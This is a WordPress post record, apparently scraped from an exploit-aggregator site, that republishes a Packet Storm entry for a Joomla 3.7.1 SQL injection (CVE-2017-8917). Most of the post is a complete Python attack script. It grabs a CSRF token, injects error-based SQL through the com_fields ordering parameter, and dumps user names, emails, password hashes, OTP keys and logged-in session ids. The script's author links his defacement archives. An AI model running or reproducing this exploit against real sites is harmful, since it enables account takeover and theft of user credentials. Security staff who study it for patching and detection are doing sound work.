{"id":1163,"date":"2025-04-23T06:16:18","date_gmt":"2025-04-23T06:16:18","guid":{"rendered":"http:\/\/localhost\/?p=1163"},"modified":"2025-04-23T06:16:18","modified_gmt":"2025-04-23T06:16:18","slug":"joomla-371-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1163","title":{"rendered":"Joomla 3.7.1 SQL Injection"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Joomla 3.7.1 SQL Injection<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">PACKETSTORM:190574<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">packetstorm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">9.8<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #cc0000; font-weight: bold;\">CRITICAL<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2017-8917<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nJoomla&#8230;&#8230;&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: Joomla 3.7.1 &#8211; Sql Injection<br \/>    Date: 2025-04-16<br \/>    # Exploit Author: Milad Karimi (Ex3ptionaL)<br \/>    # Contact: miladgrayhat@gmail.com<br \/>    # Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL<br \/>    # MiRROR-H: https:\/\/mirror-h.org\/search\/hacker\/49626\/<br \/>    # Vendor Homepage: https:\/\/www.joomla.org\/<br \/>    # Version: = 3.7.1<br \/>    # Tested on: Win, Ubuntu<br \/>    # CVE : &#8211; CVE-2017-8917<\/p>\n<p>    #!\/usr\/bin\/python<br \/>    from __future__ import print_function<br \/>    import requests<br \/>    import sys<br \/>    import re<br \/>    import argparse<br \/>    import os<br \/>    import random<br \/>    import time<br \/>    import binascii<\/p>\n<p>    def extract_token(resp):<br \/>     match = re.search(r&#8217;name=&#8221;([a-f0-9]{32})&#8221; value=&#8221;1&#8243;&#8216;, resp.text, re.S)<br \/>     if match is None:<br \/>      print(&#8221; [!] Cannot find CSRF token&#8221;)<br \/>      return None<br \/>     return match.group(1)<\/p>\n<p>    def parse_options():<br \/>     parser = argparse.ArgumentParser(description=&#8217;Jooma Exploit&#8217;)<br \/>     parser.add_argument(&#8216;url&#8217;, help=&#8217;Base URL for Joomla site&#8217;)<br \/>     return parser.parse_args()<\/p>\n<p>    def build_sqli(colname, morequery):<br \/>     return &#8220;(SELECT &#8221; + colname + &#8221; &#8221; + morequery + &#8220;)&#8221;<\/p>\n<p>    def joomla_370_sqli_extract(options, sess, token, colname, morequery):<br \/>     sqli = build_sqli(&#8220;LENGTH(&#8220;+colname+&#8221;)&#8221;, morequery)<br \/>     length = joomla_370_sqli(options, sess, token, sqli)<br \/>     if not length:<br \/>      return None<br \/>     length = int(length)<br \/>     maxbytes = 30<br \/>     offset = 0<br \/>     result = &#8221;<br \/>     while length > offset:<br \/>      sqli = build_sqli(&#8220;HEX(MID(%s,%d,%d))&#8221; % (colname, offset + 1, 16),<br \/>    morequery)<br \/>      value = joomla_370_sqli(options, sess, token, sqli)<br \/>      if not value:<br \/>       print(&#8221; [!] Failed to retrieve string for query:&#8221;, sqli)<br \/>       return None<br \/>      value = binascii.unhexlify(value).decode(&#8220;utf-8&#8221;)<br \/>      result += value<br \/>      offset += len(value)<br \/>     return result<\/p>\n<p>    def joomla_370_sqli(options, sess, token, sqli):<br \/>     sqli_full = &#8220;UpdateXML(2, concat(0x3a,&#8221; + sqli + &#8220;, 0x3a), 1)&#8221;<br \/>     data = {<br \/>      &#8216;option&#8217;: &#8216;com_fields&#8217;,<br \/>      &#8216;view&#8217;: &#8216;fields&#8217;,<br \/>      &#8216;layout&#8217;: &#8216;modal&#8217;,<br \/>      &#8216;list[fullordering]&#8217;: sqli_full,<br \/>      token: &#8216;1&#8217;,<br \/>     }<br \/>     resp = sess.get(options.url +<br \/>    &#8220;\/index.php?option=com_fields&#038;view=fields&#038;layout=modal&#8221;, params=data,<br \/>    allow_redirects=False)<br \/>     match = re.search(r&#8217;XPATH syntax<br \/>    error:\\s*&#039;([^$\\n]+)\\s*&#039;\\s*<\/bl', resp.text, re.S)<br \/>     if match:<br \/>      match = match.group(1).strip()<br \/>      if match[0] != &#8216;:&#8217; and match[-1] != &#8216;:&#8217;:<br \/>       return None<br \/>      return match[1:-1]<\/p>\n<p>    def extract_joomla_tables(options, sess, token):<br \/>     tables = list()<br \/>     first = False<br \/>     offset = 0<br \/>     while True:<br \/>      result = joomla_370_sqli_extract(options, sess, token, &#8220;TABLE_NAME&#8221;,<br \/>    &#8220;FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT<br \/>    &#8221; + str(offset) + &#8220;,1&#8221; )<br \/>      if result is None:<br \/>       if first:<br \/>        print(&#8220;[!] Failed to retrieve first table name!&#8221;)<br \/>        return False<br \/>       break<br \/>      tables.append(result)<br \/>      print(&#8221; &#8211; Found table:&#8221;, result)<br \/>      first = False<br \/>      offset += 1<br \/>     return tables<\/p>\n<p>    def extract_joomla_users(options, sess, token, table_name):<br \/>     users = list()<br \/>     offset = 0<br \/>     first = False<br \/>     print(&#8221; &#8211; Extracting users from&#8221;, table_name)<br \/>     while True:<br \/>      result = joomla_370_sqli_extract(options, sess, token,<br \/>    &#8220;CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)&#8221;,<br \/>    &#8220;FROM %s ORDER BY registerDate ASC LIMIT %d,1&#8221; % (table_name, offset) )<br \/>      if result is None:<br \/>       if first:<br \/>        print(&#8220;[!] Failed to retrieve user from table!&#8221;)<br \/>        return False<br \/>       break<br \/>      result = result.split(&#8216;|&#8217;)<br \/>      print(&#8221; [$] Found user&#8221;,result)<br \/>      first = False<br \/>      offset += 1<br \/>      users.append(result)<br \/>     return users<\/p>\n<p>    def extract_joomla_sessions(options, sess, token, table_name):<br \/>     sessions = list()<br \/>     offset = 0<br \/>     first = False<br \/>     print(&#8221; &#8211; Extracting sessions from&#8221;, table_name)<br \/>     while True:<br \/>      result = joomla_370_sqli_extract(options, sess, token,<br \/>    &#8220;CONCAT(userid,0x7c,session_id,0x7c,username)&#8221;, &#8220;FROM %s WHERE guest = 0<br \/>    LIMIT %d,1&#8243; % (table_name, offset) )<br \/>      if result is None:<br \/>       if first:<br \/>        print(&#8220;[!] Failed to retrieve session from table!&#8221;)<br \/>        return False<br \/>       break<br \/>      result = result.split(&#8216;|&#8217;)<br \/>      print(&#8221; [$] Found session&#8221;, result)<br \/>      first = False<br \/>      offset += 1<br \/>      sessions.append(result)<br \/>     return sessions<\/p>\n<p>    def pwn_joomla_again(options):<br \/>     sess = requests.Session()<\/p>\n<p>     print(&#8221; [-] Fetching CSRF token&#8221;)<br \/>     resp = sess.get(options.url + &#8220;\/index.php\/component\/users\/?view=login&#8221;)<br \/>     token = extract_token(resp)<br \/>     if not token:<br \/>      return False<\/p>\n<p>     # Verify that we can perform SQLi<br \/>     print(&#8221; [-] Testing SQLi&#8221;)<br \/>     result = joomla_370_sqli(options, sess, token, &#8220;128+127&#8221;)<br \/>     if result != &#8220;255&#8221;:<br \/>      print(&#8221; [!] Could not find SQLi output!&#8221;)<br \/>      return False<\/p>\n<p>     tables = extract_joomla_tables(options, sess, token)<\/p>\n<p>     for table_name in tables:<br \/>      table_prefix = table_name[:-5]<br \/>      extract_joomla_users(options, sess, token, table_name)<br \/>      extract_joomla_sessions(options, sess, token, table_prefix + &#8216;session&#8217;)<\/p>\n<p>     return True<\/p>\n<p>    def print_logo():<br \/>     clear = &#8220;\\x1b[0m&#8221;<br \/>     colors = [31, 32, 33, 34, 35, 36]<\/p>\n<p>     logo = &#8220;&#8221;&#8221;<\/p>\n<p>        .&#8212;. .-&#8221;&#8217;-. .-&#8221;&#8217;-.<\/p>\n<p>        | | &#8216; _ \\ &#8216; _ \\ .&#8212;.<br \/>        &#8216;&#8212;&#8216; \/ \/` &#8216;. \\ \/ \/` &#8216;. \\ __ __ ___ \/| | | .<br \/>        .&#8212;.. | \\ &#8216; . | \\ &#8216; | |\/ `.&#8217; `. || | | .&#8217;|<br \/>        | || &#8216; | &#8216;| &#8216; | &#8216;| .-. .-. &#8216;|| | | < |<br \/>        | |\\ \\ \/ \/ \\ \\ \/ \/ | | | | | ||| __ | | __ | |<br \/>        | | `. ` ..&#8217; \/ `. ` ..&#8217; \/ | | | | | |||\/&#8217;__ &#8216;. | | .:&#8211;.&#8217;. | | .&#8221;&#8217;-.<\/p>\n<p>        | | &#8216;-&#8230;-&#8216;` &#8216;-&#8230;-&#8216;` | | | | | ||:\/` &#8216;. &#8216;| |\/ | \\ | | |\/.&#8221;&#8217;. \\<br \/>        | | | | | | | ||| | || |`&#8221; __ | | | \/ | |<br \/>        | | |__| |__| |__|||\\ \/ &#8216;| | .&#8217;.&#8221;| | | | | |<br \/>     __.&#8217; &#8216; |\/\\&#8217;..&#8217; \/ &#8216;&#8212;&#8216;\/ \/ | |_| | | |<br \/>    | &#8216; &#8216; `&#8217;-&#8216;` \\ \\._,\\ &#8216;\/| &#8216;. | &#8216;.<br \/>    |____.&#8217; `&#8211;&#8216; `&#8221; &#8216;&#8212;&#8216; &#8216;&#8212;&#8216;<br \/>    &#8220;&#8221;&#8221;<br \/>     for line in logo.split(&#8220;\\n&#8221;):<br \/>      sys.stdout.write(&#8220;\\x1b[1;%dm%s%s\\n&#8221; % (random.choice(colors), line,<br \/>    clear))<br \/>      #time.sleep(0.05)<\/p>\n<p>    def main(base_url):<br \/>     options = parse_options()<br \/>     options.url = options.url.rstrip(&#8216;\/&#8217;)<br \/>     print_logo()<br \/>     pwn_joomla_again(options)<\/p>\n<p>    if __name__ == &#8220;__main__&#8221;:<br \/>     sys.exit(main(&#8220;http:\/\/192.168.10.100:8080\/joomla&#8221;))\n<\/div>\n<p><a href=\"https:\/\/packetstorm.news\/files\/id\/190574\/\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Joomla 3.7.1 SQL Injection Exploit ID PACKETSTORM:190574 Type packetstorm Published 2025-04-21T00:00:00 Modified 2025-04-21T00:00:00 CVSS Information CVSS Score 9.8 Severity&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-1163","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Joomla 3.7.1 SQL Injection - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=1163\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Joomla 3.7.1 SQL Injection - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Joomla 3.7.1 SQL Injection Exploit ID PACKETSTORM:190574 Type packetstorm Published 2025-04-21T00:00:00 Modified 2025-04-21T00:00:00 CVSS Information CVSS Score 9.8 Severity...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=1163\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T06:16:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Joomla 3.7.1 SQL Injection\",\"datePublished\":\"2025-04-23T06:16:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163\"},\"wordCount\":331,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1163#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163\",\"name\":\"Joomla 3.7.1 SQL Injection - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-23T06:16:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1163\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1163#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Joomla 3.7.1 SQL Injection\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Joomla 3.7.1 SQL Injection - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=1163","og_locale":"en_US","og_type":"article","og_title":"Joomla 3.7.1 SQL Injection - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Joomla 3.7.1 SQL Injection Exploit ID PACKETSTORM:190574 Type packetstorm Published 2025-04-21T00:00:00 Modified 2025-04-21T00:00:00 CVSS Information CVSS Score 9.8 Severity...","og_url":"https:\/\/zero.redgem.net\/?p=1163","og_site_name":"zero redgem","article_published_time":"2025-04-23T06:16:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=1163#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=1163"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Joomla 3.7.1 SQL Injection","datePublished":"2025-04-23T06:16:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=1163"},"wordCount":331,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=1163#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=1163","url":"https:\/\/zero.redgem.net\/?p=1163","name":"Joomla 3.7.1 SQL Injection - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-23T06:16:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=1163#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=1163"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=1163#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Joomla 3.7.1 SQL Injection"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1163"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1163\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}